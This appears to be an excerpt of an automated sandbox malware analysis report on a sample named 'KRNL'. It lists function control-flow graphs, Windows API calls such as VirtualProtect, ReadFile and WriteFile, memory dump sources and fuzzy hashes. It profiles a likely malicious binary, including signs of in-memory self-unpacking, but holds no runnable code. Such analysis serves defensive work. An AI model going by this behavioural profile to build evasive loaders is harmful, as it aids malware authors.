                                                                                                                                                                                                                                                          control_flow_graph 353 703bf4-703c16 354 703e09 353->354 355 703c1c-703c1e 353->355 358 703e0b-703e0f 354->358 356 703c20-703c3f call 6f7f78 355->356 357 703c4a-703c6d 355->357 364 703c42-703c45 356->364 360 703c73-703c79 357->360 361 703c6f-703c71 357->361 360->356 363 703c7b-703c8c 360->363 361->360 361->363 365 703c8e-703c9c call 7029a2 363->365 366 703c9f-703caf call 703f21 363->366 364->358 365->366 371 703cb1-703cb7 366->371 372 703cf8-703d0a 366->372 373 703ce0-703cf6 call 703f9e 371->373 374 703cb9-703cbc 371->374 375 703d61-703d81 WriteFile 372->375 376 703d0c-703d12 372->376 396 703cd9-703cdb 373->396 377 703cc7-703cd6 call 704365 374->377 378 703cbe-703cc1 374->378 380 703d83-703d89 GetLastError 375->380 381 703d8c 375->381 382 703d14-703d17 376->382 383 703d4d-703d5a call 7043cd 376->383 377->396 378->377 386 703da1-703da4 378->386 380->381 390 703d8f-703d9a 381->390 384 703d39-703d4b call 704591 382->384 385 703d19-703d1c 382->385 395 703d5f 383->395 403 703d34-703d37 384->403 391 703da7-703da9 385->391 392 703d22-703d2f call 7044a8 385->392 386->391 397 703e04-703e07 390->397 398 703d9c-703d9f 390->398 399 703dd7-703de3 391->399 400 703dab-703db0 391->400 392->403 395->403 396->390 397->358 398->386 406 703de5-703deb 399->406 407 703ded-703dff 399->407 404 703db2-703dc4 400->404 405 703dc9-703dd2 call 6f7770 400->405 403->396 404->364 405->364 406->354 406->407 407->364
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00703F9E: GetConsoleOutputCP.KERNEL32(AB1687B8,00000000,00000000,?), ref: 00704001
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,006F8584,?), ref: 00703D79
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,006F8584,?,006F87C8,00000000,?,00000000,006F87C8,?,?,?,00718FE8,0000002C,006F86B4,?), ref: 00703D83
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                                          • Opcode ID: ed1486fc6a07da4e208f8b128248b2828f78674307ec7b5fc86ffeb384ffa155
                                                                                                                                                                                                                                                          • Instruction ID: 62e97723613b5c56a0f26bc10c353d1149627fdacc60b619481787c0bf16e06e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed1486fc6a07da4e208f8b128248b2828f78674307ec7b5fc86ffeb384ffa155
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 736171B5904159EFDF15DFA8C884AEEBBFDAB09304F144249E904E7292D779DA01CBA0
                                                                                                                                                                                                                                                          Function 007043CD Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 410 7043cd-704422 call 6f0050 413 704424 410->413 414 704497-7044a7 call 6ea6e1 410->414 416 70442a 413->416 417 704430-704432 416->417 419 704434-704439 417->419 420 70444c-704471 WriteFile 417->420 421 704442-70444a 419->421 422 70443b-704441 419->422 423 704473-70447e 420->423 424 70448f-704495 GetLastError 420->424 421->417 421->420 422->421 423->414 425 704480-70448b 423->425 424->414 425->416 426 70448d 425->426 426->414
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00703D5F,00000000,006F87C8,?,00000000,?,00000000), ref: 00704469
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00703D5F,00000000,006F87C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,006F8584), ref: 0070448F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                                                                                                          • Opcode ID: 981bf949616a839a9e9b20c4ffc5e20eb4e3ed5e71cd2e59b881d077b7e58024
                                                                                                                                                                                                                                                          • Instruction ID: 6bd2013b2fbe04faaa34e0a0c1d476acb6e3734d7a67dad37b2942391c646656
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 981bf949616a839a9e9b20c4ffc5e20eb4e3ed5e71cd2e59b881d077b7e58024
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF21B174A00258DBCF19CF19DC80AEDB7FAEB48305F1481A9EA06D7251E634EE42CB64
                                                                                                                                                                                                                                                          Function 006E90F0 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 427 6e90f0-6e9130 call 6eefc1 430 6e9136-6e913d 427->430 431 6e91c7-6e91c9 call 6eb317 427->431 432 6e91ce-6e91df call 6eb317 430->432 433 6e9143-6e9149 430->433 431->432 443 6e919f-6e91aa 432->443 435 6e914b-6e9172 call 6eefd2 433->435 436 6e9174-6e919a call 6eefd2 call 6e92f0 433->436 445 6e91b6-6e91c6 435->445 436->443 443->445 446 6e91b1 call 6ea660 443->446 446->445
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E91C9
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E91D7
                                                                                                                                                                                                                                                            • Part of subcall function 006EEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,006E8E4A,006EA2F0), ref: 006EEFE7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3666349979-0
                                                                                                                                                                                                                                                          • Opcode ID: cd88f1f667b210fe5e543e0102a2196f66259532c05f28dfb5a43cc5f9518821
                                                                                                                                                                                                                                                          • Instruction ID: 084a2442de05f85878169cacd14794732f92b255e231794e6806c327945b3e65
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd88f1f667b210fe5e543e0102a2196f66259532c05f28dfb5a43cc5f9518821
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B021F3B0A01786DBDB109F65C945BAEBBB6FF04320F144228E5256B3C1D734A905CBE6
                                                                                                                                                                                                                                                          Function 006FDA52 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 449 6fda52-6fda57 450 6fda59-6fda71 449->450 451 6fda7f-6fda88 450->451 452 6fda73-6fda77 450->452 454 6fda9a 451->454 455 6fda8a-6fda8d 451->455 452->451 453 6fda79-6fda7d 452->453 456 6fdaf4-6fdaf8 453->456 459 6fda9c-6fdaa9 GetStdHandle 454->459 457 6fda8f-6fda94 455->457 458 6fda96-6fda98 455->458 456->450 462 6fdafe-6fdb01 456->462 457->459 458->459 460 6fdaab-6fdaad 459->460 461 6fdad6-6fdae8 459->461 460->461 463 6fdaaf-6fdab8 GetFileType 460->463 461->456 464 6fdaea-6fdaed 461->464 463->461 465 6fdaba-6fdac3 463->465 464->456 466 6fdacb-6fdace 465->466 467 6fdac5-6fdac9 465->467 466->456 468 6fdad0-6fdad4 466->468 467->456 468->456
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006FD941,00719330,0000000C), ref: 006FDA9E
                                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006FD941,00719330,0000000C), ref: 006FDAB0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3000768030-0
                                                                                                                                                                                                                                                          • Opcode ID: 8613c942bff687ceb27cdf58e404b2b7aa0e1456d69c60e68219964bf05639cb
                                                                                                                                                                                                                                                          • Instruction ID: 5feed51eb39cbc3de781f97cc56136cced6098ac5a56e21ab9adb456cea165b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8613c942bff687ceb27cdf58e404b2b7aa0e1456d69c60e68219964bf05639cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6711293150C75A4AC7308E3ECC886727F97AB56330B380759D6B6862F5C774F886C249
                                                                                                                                                                                                                                                          Function 006E1EF0 Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
                                                                                                                                                                                                                                                          • FreeConsole.KERNELBASE(?,?,?,?,?,006E173F,?,?,?,00000000,?), ref: 006E1F21
                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0071A011,00000549,00000040,?), ref: 006E1F78
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1248733679-0
                                                                                                                                                                                                                                                          • Opcode ID: 680b42587293cf0d925100d1c921269f16391613869f63e579d2d4a53df6c9c3
                                                                                                                                                                                                                                                          • Instruction ID: 31e7e8dcb56808238681cec2b23c57108cb2655656e0c458f93d643c6e2bd0ce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680b42587293cf0d925100d1c921269f16391613869f63e579d2d4a53df6c9c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C110A71A413047BDB40BBA99C03EFE77B5DB49700F008439F608AB2C2F679995057D9
                                                                                                                                                                                                                                                          Function 006F5470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00718E38,0000000C), ref: 006F5483
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 006F548A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                                                                                                          • Opcode ID: be934c6adc98e663fec5b15ccf1a2c10a589b4808fad3668b6938adedbdaf604
                                                                                                                                                                                                                                                          • Instruction ID: a7da837acad3931ce3ef8bf56d141fcaa04b9d5750ffc083b45094d9ad79f376
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be934c6adc98e663fec5b15ccf1a2c10a589b4808fad3668b6938adedbdaf604
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0AF71A00608AFDB00AF74C90AABE7B72EF41750F10815DF6069B292DF78AD41CBA5
                                                                                                                                                                                                                                                          Function 006E2270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 006E2288
                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E229C
                                                                                                                                                                                                                                                            • Part of subcall function 006E1FB0: CreateFileA.KERNELBASE ref: 006E2036
                                                                                                                                                                                                                                                            • Part of subcall function 006E1FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
                                                                                                                                                                                                                                                            • Part of subcall function 006E1FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 006E206B
                                                                                                                                                                                                                                                            • Part of subcall function 006E1FB0: CloseHandle.KERNELBASE(00000000), ref: 006E207A
                                                                                                                                                                                                                                                            • Part of subcall function 006E1FB0: _strlen.LIBCMT ref: 006E20CD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3505371420-0
                                                                                                                                                                                                                                                          • Opcode ID: b4c42af7bbfc7ea98430c1ad9f099ac8b9f6eb596d1e684155966f2dddcebb0a
                                                                                                                                                                                                                                                          • Instruction ID: ac20e67e1bf43da642a831b8f7e1c31fc6c972f75e73055023c97470e99c208d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4c42af7bbfc7ea98430c1ad9f099ac8b9f6eb596d1e684155966f2dddcebb0a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF0E5B190135067D1616B29AC0BEEF7BACDF99710F008518F6894A1C1EA78614586E7
                                                                                                                                                                                                                                                          Function 006FBED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,007002B4,?,00000000,?,?,006FFF54,?,00000007,?,?,0070089A,?,?), ref: 006FBEED
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,007002B4,?,00000000,?,?,006FFF54,?,00000007,?,?,0070089A,?,?), ref: 006FBEF8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                          • Opcode ID: 58f271d9eaef2254e5bf7dd9f46f9390a100cd8c37200114c0cf8e5d5f937242
                                                                                                                                                                                                                                                          • Instruction ID: 02783ddd433b28eeaffcbeb98c1c4133e592a92558274e4dc78d7e85b3136c91
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f271d9eaef2254e5bf7dd9f46f9390a100cd8c37200114c0cf8e5d5f937242
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E0E67120965867CB112FA9EC09BE53B59EB407D1F14D065F708962B0DB359850CFDC
                                                                                                                                                                                                                                                          Function 006EDEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: be433b8706279428a230e0bab54746ab2c457702d4221f02d54a625234491247
                                                                                                                                                                                                                                                          • Instruction ID: 18fae3829320677e7c757cdf1ad6cfc252f4ff919e55ae1fc74f6588c39437d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be433b8706279428a230e0bab54746ab2c457702d4221f02d54a625234491247
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD41B231A0125AAFCB14DF69C8949EEB7BAFF18310B544069E402E7780E731F955DB90
                                                                                                                                                                                                                                                          Function 006ECB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 195648ee03f901e4bb2308761a8e81a369c4064c27545fad280009de945f649a
                                                                                                                                                                                                                                                          • Instruction ID: fed9328187b43f84450a3fa6b3cfc9f05eed19b14dc5d775bd78015324e4fd91
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 195648ee03f901e4bb2308761a8e81a369c4064c27545fad280009de945f649a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731A57290135AAFCB04CF69D8949EDB7BABF09330B24426AE515E3390E731F945CB90
                                                                                                                                                                                                                                                          Function 006EB060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
